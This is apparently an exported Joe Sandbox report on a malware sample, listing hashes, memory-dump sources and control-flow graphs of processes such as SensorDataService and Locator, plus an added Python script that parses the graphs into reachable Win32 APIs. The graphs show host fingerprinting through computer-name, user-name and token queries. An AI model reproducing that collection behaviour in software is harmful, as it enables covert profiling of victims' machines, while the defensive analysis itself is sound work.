                                                                                                                                                                      • Opcode ID: 44fc918203370577ffa5a0699f13e43ea08077780067373ea2856eea6fd82d3b
                                                                                                                                                                      • Instruction ID: 13adf3fbc7a56973b1f7217784f4ebfbcdb7a45d9d38951b5fd75cbb0f3bfad9
                                                                                                                                                                      • Opcode Fuzzy Hash: 44fc918203370577ffa5a0699f13e43ea08077780067373ea2856eea6fd82d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E21F275605384DFDB24DF14D9C4B16BB65FB88314F28C56DD84A4B286C33ADC47CA62
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bf2f2cb85eb72b85e6496fcb50583b80056cc5f4af2d5bb3e62a22feb0ea0ae4
                                                                                                                                                                      • Instruction ID: ff2f65689bd58d9b114c4cb397967a37c680a3cc00a3e8c27ac8cc95b0e2422f
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2f2cb85eb72b85e6496fcb50583b80056cc5f4af2d5bb3e62a22feb0ea0ae4
                                                                                                                                                                      • Instruction Fuzzy Hash: D9210775A05384DFDB25DF11D9C0B15BB69FB88314F20C56DD9494F292C33ADC46CA61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c82ad7daf9bad496951659986f71fc184c29cea5a30918f8471be3e37f027d3b
                                                                                                                                                                      • Instruction ID: a2468eb2c39e02f9a1da25f5aeea2a220078a1bb31bea7f583f440dd30f27786
                                                                                                                                                                      • Opcode Fuzzy Hash: c82ad7daf9bad496951659986f71fc184c29cea5a30918f8471be3e37f027d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: CD114970E0121ACFDB58DFA9C444AAEF7F1EF88310F15C46AD418AB761DB349942CB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction ID: 36b9fe925880d5b9fe41563f8405a8a95ddb6b94afa985f37b1a4e82ccccf0d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9711E676504280DFCB15CF14D5C4B16BF72FB94324F24C6AAD84A0B756C33AD866CBA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3dff822d5fcd68fefa8ea8579b330b7ca3beba86a6eed52c6b1f329e3e5c2d68
                                                                                                                                                                      • Instruction ID: 3e9b99e9e0483e1ff8e0c35055291d321e32d58a184a5ef145a0b4c91c5c5650
                                                                                                                                                                      • Opcode Fuzzy Hash: 3dff822d5fcd68fefa8ea8579b330b7ca3beba86a6eed52c6b1f329e3e5c2d68
                                                                                                                                                                      • Instruction Fuzzy Hash: E911C2748043489FDB51DF78C804A9B7FB2EF86300B55C5AAD045CB662C735C846CF65
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d3c578f0d36397d20b48ca50ae869806f8b0355e78cc7b6cfca6c8d98cb18d39
                                                                                                                                                                      • Instruction ID: d5a7fc1bf1726f3e47cc63a72a49f9f4e9ecf2d2c30c6933609a625480fb8f71
                                                                                                                                                                      • Opcode Fuzzy Hash: d3c578f0d36397d20b48ca50ae869806f8b0355e78cc7b6cfca6c8d98cb18d39
                                                                                                                                                                      • Instruction Fuzzy Hash: 3611F374E0121ACFDB58DF69C044AAEBBF2AF88310F258469D418AB761DB349942CB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction ID: 27e1994989ea866ff78aff39e71e152f36db96f7b868016ccd9d23ae3b3780a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E119D79504280DFCB15DF14D6C4B15FBB2FB88324F24C6ADD9494B696C33AD84ACB61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
Memory Dump Source
• Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
Memory Dump Source
• Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
Memory Dump Source
• Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 0%
Total number of Nodes: 79
Total number of Limit Nodes: 5
API calls referenced by the execution graph nodes: VirtualAlloc, VirtualFree, CreateThread, GetComputerNameW, GetUserNameW, GetTokenInformation, CloseHandle.

Control-flow Graph (function entry 4c52a0)
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 004C53C4
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: DefaultLangSystem

Control-flow Graph (function entry 4e0080)
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: ComputerName

Control-flow Graph (function entry 4c8070)
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd

Control-flow Graph (function entry 4c5910)
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd

Control-flow Graph (API calls in graph: CreateThread)
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: 32258154924604f7f18ecc769c5b9cea0415959b4aa62b0fa6b9201b33b30855
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: 4A21822810CF458FDBE997189848F7E6AE1AB55310F5841AF9047CF392DA2CBCC5931E

Control-flow Graph (API calls in graph: CreateThread)
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 12dfba167f705562a6086b7466c9fd2d208511165507b1cffbfd6856bb1881b7
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: AA01AD3810DF468EEBD556248C58F7E6A90AB50324F6401AFC487CA191EA6C79C2A70F

Control-flow Graph (API calls in graph: CreateThread)
APIs
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: c046ac2f032d7e43114e27664372dfe95edad6a3083be5fdb60f270ffa2760d1
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: A9E0863460DB444FEB999B24582071E7EE5EB88310F1502CFC44AD72D5DB6D3E46478B

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: fbbd761bf2940dbdc0b6fca2688fa355d020a9a4ab31128d0d393044c036d54b
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 6501DFEC60DE80CFD6DAA6195401F7E2552A754324F2801DF904AC7292C87DB9C2978E

Control-flow Graph (API calls in graph: CloseHandle, GetTokenInformation)
APIs
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: b0a64aaf1dc272858245ba5fb60eab6aabc5c38a2e5de13ab2b36a37e8336e9e
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 06C08C7C13880A9657F80A480C0BFB226C49202350B0E000F8C0280320DD0C8E03009F

Control-flow Graph (API calls in graph: CloseHandle, GetTokenInformation)
APIs
Memory Dump Source
• Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: c2195d8f4d9cdb0b84694d99ec59b186e115fcaf9154792078a8137cc9650252
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: A3C092BC5A850D8756F82B882C0AEB335D85613760F0E541FED069A362DD5C4D4345AF

Execution Graph (API calls in graph: VirtualAlloc, VirtualFree, CreateThread, GetComputerNameW, GetUserNameW, GetTokenInformation, CloseHandle)

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 0%
Total number of Nodes: 79
Total number of Limit Nodes: 5

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 293 6c52a0-6c52a5 294 6c532e-6c533f 293->294 295 6c52ab-6c52f5 293->295 299 6c536b-6c5390 294->299 295->294 298 6c52f7 295->298 300 6c53fe 298->300 308 6c5392-6c539a 299->308 309 6c53c3 299->309 302 6c5404-6c540e 300->302 303 700d4c-700d4e 300->303 305 6c5424 302->305 306 6c542a 305->306 307 6c539b 305->307 306->307 310 6c5430-6c5443 306->310 311 6c539d-6c53a1 307->311 312 6c5413-6c5419 307->312 308->307 313 6c53a7 311->313 314 6c52b0-6c52b5 311->314 313->314 315 6c53ad 313->315 316 6c53af-6c53f1 315->316 317 6c53f3-6c53f9 315->317 316->312 316->317 317->300 320 6c5322-6c5328 317->320 321 6c532a 320->321 322 6c5355 320->322 321->322 323 6c532c 321->323 325 6c52e8-6c5363 322->325 326 6c52d1-6c52e7 322->326 323->294 329 6c5365 325->329 330 6c53d1-6c53d5 325->330 326->325 329->330 332 6c5367-6c5369 329->332 330->311 331 6c53d7 330->331 334 6c534b 331->334 335 6c5400-6c540e 331->335 332->299 334->335 336 6c5351-6c5353 334->336 335->305 336->322
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 006C53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 92474f1bab98151f070f3345188d067c281996d052150673fbd02a1fe766ff72
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41C36140DED58FD72A52244C64FF17BD2DB113A2F9941DED08B8A2E2F2987CC29366
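The execution_graph listing above and the control_flow_graph listings in this section are Graphviz-style node/edge text that the export flattened into single lines: a node is "<id> <hex address>" (or "<id> <start>-<end>" in a control-flow graph), an edge is "<id>-><id>", and whatever follows a node is its label, which is either an API name, an internal callee written as "call <address> * <count>", or a summary such as "5 API calls" where the plugin collapsed a sub-tree. The Python below is an added example and not part of the Joe Sandbox report: it parses that text (the token shapes are an assumption read off the dump itself), finds the roots the graph was drawn from, lists the Win32 APIs reachable from each root, and flags the collapsed nodes below which such a reachability answer is blind. The two inputs are shortened excerpts copied from this page, not the complete dumps.

```python
"""Parse Joe Sandbox's flattened execution_graph / control_flow_graph text into a graph."""
import re
from collections import deque

# Assumed token shapes, taken from the dump above: "<decimal id> <hex addr>" or
# "<decimal id> <hex start>-<hex end>" starts a node, "<id>-><id>" is an edge, and
# any other token that follows a node belongs to that node's label.
_ID = re.compile(r"\d+")
_ADDR = re.compile(r"[0-9a-f]{6,16}(?:-[0-9a-f]{6,16})?")
_API = re.compile(r"[A-Z][a-z][A-Za-z0-9]*")      # VirtualAlloc, GetUserNameW; not "API"
_SUMMARY = re.compile(r"\d+ API calls")           # a node whose callees were collapsed


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (address or range, [label tokens])."""
    tokens = text.split()
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif _ID.fullmatch(tok) and i + 1 < len(tokens) and _ADDR.fullmatch(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (tokens[i + 1], [])
            i += 2
        else:
            if current is not None:    # the leading "execution_graph" word is dropped
                nodes[current][1].append(tok)
            i += 1
    return nodes, edges


def api_names(labels):
    """API names among a node's label tokens ("5 API calls" contributes none)."""
    return [t for t in labels if _API.fullmatch(t) and t != "API"]


def internal_calls(labels):
    """'call 6ce050 * 2' -> [('6ce050', 2)]: callees inside the dump and their repeat count."""
    calls = []
    for i, tok in enumerate(labels):
        if tok == "call" and i + 1 < len(labels):
            count = int(labels[i + 3]) if labels[i + 2:i + 3] == ["*"] else 1
            calls.append((labels[i + 1], count))
    return calls


def entry_points(nodes, edges):
    """Nodes that nothing jumps to: the roots the plugin drew the graph from."""
    targets = {d for _, d in edges}
    return sorted(n for n in nodes if n not in targets)


def collapsed_nodes(nodes):
    """Nodes labelled 'N API calls'; reachability through them sees none of those N calls."""
    return sorted(n for n, (_, labels) in nodes.items() if _SUMMARY.fullmatch(" ".join(labels)))


def reachable_apis(nodes, edges, entry):
    """Sorted API names on every node reachable from `entry` (breadth-first over the edges)."""
    adj = {}
    for s, d in edges:
        adj.setdefault(s, []).append(d)
    seen, queue, apis = {entry}, deque([entry]), set()
    while queue:
        n = queue.popleft()
        apis.update(api_names(nodes.get(n, ("", []))[1]))
        for d in adj.get(n, ()):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return sorted(apis)


# Constructed inputs: shortened excerpts of the execution_graph and of the second
# control_flow_graph on this page (the full dumps are much longer).
EXEC_GRAPH = (
    "execution_graph 5713 6c5b00 5714 6c5bba 5713->5714 5721 6d52c0 5714->5721 5716 6c5bc7 "
    "5720 6c5bde 5716->5720 5726 6e0080 5716->5726 5722 6d52c6 5721->5722 5725 6d52ce "
    "5721->5725 5722->5725 5740 6ce050 5722->5740 5725->5716 5731 6e0089 5726->5731 "
    "5727 6e03e0 GetComputerNameW 5727->5731 5728 6e0181 VirtualFree 5728->5731 "
    "5729 6ce050 VirtualAlloc 5729->5731 5730 6e03bf GetUserNameW 5730->5731 5731->5727 "
    "5731->5728 5731->5729 5731->5730 5732 6e04d6 GetComputerNameW 5731->5732 5733 6c5c7b "
    "5731->5733 5732->5731 5734 6c8070 5733->5734 5738 6c8075 5734->5738 5735 6c8186 "
    "CloseHandle 5735->5738 5736 6c80ca GetTokenInformation 5736->5738 5737 6c81ad "
    "GetTokenInformation 5737->5738 5738->5735 5738->5736 5738->5737 5739 6c80a7 "
    "5738->5739 5739->5720 5741 6ce0c3 5740->5741 5742 6ce0d8 VirtualAlloc 5741->5742 "
    "5742->5741 5754 6c5860 5755 6d52c0 VirtualAlloc 5754->5755 5756 6c5869 5755->5756 "
    "5757 6e0080 5 API calls 5756->5757 5758 6c587d 5757->5758 5759 6c8070 3 API calls "
    "5758->5759 5760 6c5870 5759->5760"
)
CFG = (
    "control_flow_graph 0 6e0080-6e0286 2 6e028c 0->2 3 6e0099-6e0575 0->3 4 6e0445 2->4 "
    "7 6e057b 3->7 8 6e0155 3->8 4->3 6 6e044b-6e0457 4->6 10 6e0458-6e0472 GetComputerNameW "
    "6->10 7->8 11 6e0581-6e0587 7->11 9 6e02ef-6e0495 call 6ce050 * 2 8->9 9->10 53 6e043e "
    "9->53 15 6e03ee-6e03f4 10->15 16 6e024c-6e0253 10->16 13 6e058b 11->13 18 6e058c-6e0591 "
    "13->18 19 6e0181 VirtualFree 13->19"
)

if __name__ == "__main__":
    nodes, edges = parse_graph(EXEC_GRAPH)
    for root in entry_points(nodes, edges):
        print(nodes[root][0], "reaches", reachable_apis(nodes, edges, root))
    print("collapsed below:", [nodes[n][0] for n in collapsed_nodes(nodes)])
```

Run against the excerpt, the root at 6c5b00 reaches CloseHandle, GetComputerNameW, GetTokenInformation, GetUserNameW, VirtualAlloc and VirtualFree, which is the host-fingerprinting and token-inspection path the graph draws through 6e0080 and 6c8070. The root at 6c5860 walks the same two callees, but because the dump collapsed them to "5 API calls" and "3 API calls" only VirtualAlloc is visible from it; check collapsed_nodes before treating an absent API as evidence that a path does not call it.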

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 0 6e0080-6e0286 2 6e028c 0->2 3 6e0099-6e0575 0->3 4 6e0445 2->4 7 6e057b 3->7 8 6e0155 3->8 4->3 6 6e044b-6e0457 4->6 10 6e0458-6e0472 GetComputerNameW 6->10 7->8 11 6e0581-6e0587 7->11 9 6e02ef-6e0495 call 6ce050 * 2 8->9 9->10 53 6e043e 9->53 15 6e03ee-6e03f4 10->15 16 6e024c-6e0253 10->16 13 6e058b 11->13 18 6e058c-6e0591 13->18 19 6e0181 VirtualFree 13->19 40 6e00da-6e023f 15->40 41 6e03fa 15->41 20 6e01e6 16->20 21 6e0255 16->21 24 6e04ab-6e04af 18->24 25 6e0597 18->25 23 6e01a8-6e02ac call 6f7164 19->23 30 6e01ec-6e0313 call 6f715c 20->30 31 6e02b1-6e02be 20->31 27 6e02d3 21->27 23->31 43 6e04c7 24->43 25->24 26 6e059d 25->26 26->24 27->20 39 6e02d9 27->39 50 6e0318-6e031e 30->50 36 6e03bf-6e03d9 GetUserNameW 31->36 37 6e02c4 31->37 45 6e0331 36->45 37->36 46 6e02ca 37->46 39->9 40->16 54 6e0241-6e024a 40->54 41->40 47 6e0400 41->47 58 6e04cc-6e04e6 call 6f9970 GetComputerNameW 43->58 51 6e0337 45->51 52 6e0171 45->52 46->27 55 6eb1ee-6eb49f 47->55 56 6e0568-6e056b 50->56 57 6e0324 50->57 51->52 61 6e033d 51->61 59 6e013f-6e0146 52->59 60 6e0173 52->60 53->4 54->16 54->31 56->58 57->56 62 6e032a 57->62 69 6e04ec-6e0514 58->69 70 6e0131 58->70 59->13 64 6e0230 60->64 65 6e05d0-6e05d9 61->65 62->45 64->43 68 6e0236-6e05c2 64->68 65->55 68->43 74 6e05c8-6e05c9 68->74 69->56 72 6e0089-6e008c 70->72 73 6e0137 70->73 72->23 77 6e0092 72->77 73->72 75 6e013d 73->75 74->65 75->19 75->59 77->23 78 6e0098 77->78 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 964871887158013ab79fee44d01a42069770e3d4cd09d32f7118cc0283a30f3b
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 45D13931419F4D8FE724EF59D8457EAB3E2FBA0310F18461FD446C7264DAB4DA858AC2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 79 6c8070-6c817e 81 6c813d-6c81a5 79->81 82 6c8180 79->82 88 6c81bd-6c81ca 81->88 89 6c81a7 81->89 82->81 85 6c8161 82->85 87 6c8163-6c8170 call 6f7164 85->87 93 6c8186 CloseHandle 87->93 94 6c8172 87->94 95 6c81d0 88->95 96 6c80f3 88->96 97 6c818c-6c8192 93->97 94->97 110 6c81fe-6c8201 GetTokenInformation 95->110 111 6c80c3 95->111 101 6c808c 96->101 102 6c80f5 96->102 99 6c8194 97->99 100 6c8115-6c8118 97->100 99->100 105 6c819a 99->105 103 6c8119-6c811a 100->103 104 6c80a7 100->104 106 6c808e-6c8184 101->106 102->101 112 6c8077 102->112 103->104 109 6c811c 103->109 105->81 106->93 106->97 115 6c820f 109->115 110->115 125 6c81b7 110->125 111->110 116 6c80c9 111->116 117 6c81d7-6c81de call 6f715c 112->117 115->106 122 6c8215-6c821e 115->122 120 6c80ca-6c80d8 GetTokenInformation 116->120 123 6c81e3-6c81e6 117->123 124 6c810f 120->124 122->106 132 6c8224 122->132 123->120 139 6c8089 123->139 126 6c812d 124->126 127 6c8111 124->127 125->115 130 6c81b9-6c81bb 125->130 134 6c80a8 126->134 135 6c8133-6c81f0 126->135 127->126 131 6c8113 127->131 130->88 131->100 132->117 137 6c8226 132->137 136 6c80aa-6c80ad 134->136 142 6c80da-6c80f1 135->142 143 6c81f6 135->143 136->87 140 6c80b3-6c8203 136->140 137->117 141 6c8228-6c82ee call 6c5d90 137->141 139->120 144 6c808b 139->144 140->87 149 6c8209 140->149 154 6c830c-6c8320 call 6c5d90 call 6cec00 141->154 155 6c82f0 141->155 142->136 143->142 147 6c81fc 143->147 144->101 147->110 159 6c82f7-6c82fc call 6c5d90 154->159 170 6c8322 154->170 155->154 157 6c82f2 155->157 157->159 165 6c8302 159->165 166 6c8253-6c8265 call 6e1280 159->166 165->166 167 6c8308-6c830a 165->167 173 6c8328 166->173 174 6c826b 166->174 167->154 170->159 172 6c8324-6c8326 170->172 172->173 178 6c82df-6c832b 173->178 179 6c8335 173->179 174->173 177 6c823f-6c8243 174->177 
177->159 178->179 182 6c832d-6c8331 178->182 183 6c829b-6c829d 179->183 184 6c8287 179->184 182->179 184->183 186 6c824e-6c8252 184->186 186->166
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 1a34cee51a62ef21c94e848b2a1f727d4d714d0e9aa3c9a0d789ffad9fc56f74
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: C561563061CA869FC7B58B288818FB57BE3FB56350F18021ED44BC37A1CF285D469792

                                                                                                                                                                      Control-flow Graph

